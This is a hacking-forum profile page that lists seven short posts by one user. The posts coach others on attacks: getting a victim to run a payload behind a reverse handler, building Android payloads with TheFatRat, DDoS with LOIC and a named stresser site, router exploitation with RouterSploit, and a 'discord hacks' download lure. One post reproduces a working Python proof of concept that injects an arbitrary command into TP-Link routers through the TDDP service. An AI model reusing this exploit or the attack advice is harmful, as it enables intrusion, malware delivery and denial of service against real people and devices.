CROtheHacker

Members
  • Content Count

    7
  • Last visited

Community Reputation

0 Neutral

About CROtheHacker

  • Birthday 08/30/1973

Converted

  • Discord
    CROisTheJaded#7928

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. SpotifyAccountSupplierWhen I start the exploit to listen for local connection a payload I made all I get is a reverse https handler started and not I do not get payload handler started https://imgur.com/a/WvMWtiZ You're all most done.. Just have the victim go to or run an exe, sh, py, etc.. Mainly because its just the handler.. If the victim is waiting then try again..
  2. Source : https://mjg59.dreamwidth.org/51672.html Exploit : #!/usr/bin/python3 # Copyright 2019 Google LLC. # SPDX-License-Identifier: Apache-2.0 # # Execute script as poc.py remoteaddr filename import binascii import socket port_send = 1040 port_receive = 61000 tddp_ver = "01" tddp_command = "31" tddp_req = "01" tddp_reply = "00" tddp_padding = "%0.16X" % 00 tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding]) sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock_receive.bind(('', port_receive)) # Send a request sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) packet = binascii.unhexlify(tddp_packet) argument = "%s;arbitrary" % sys.argv[2] packet = packet + argument.encode() sock_send.sendto(packet, (sys.argv[1], port_send)) sock_send.close() response, addr = sock_receive.recvfrom(1024) r = response.encode('hex') print(r) Why dose this look like you coped this code lol :??: :kek: :monkas:
  3. I can make an form with the download for discord hacks.. I have everything working and stuff...
  4. I love to use LOIC & https://stressthem.to/ to DDoS!
  5. If you can I would just make one with TheFatRat and make an payload for android!
  6. I would use "RouterSploit", https://github.com/threat9/routersploit/ to scan for exploits.. Most 10.0.0.1 (Comcast/Xfinty) routers can be hacked from an PHP backdoor for an RCE.. The tool is just like MSF!
  7. Yeh - I 99% sure that you can't get IP's within discord calls..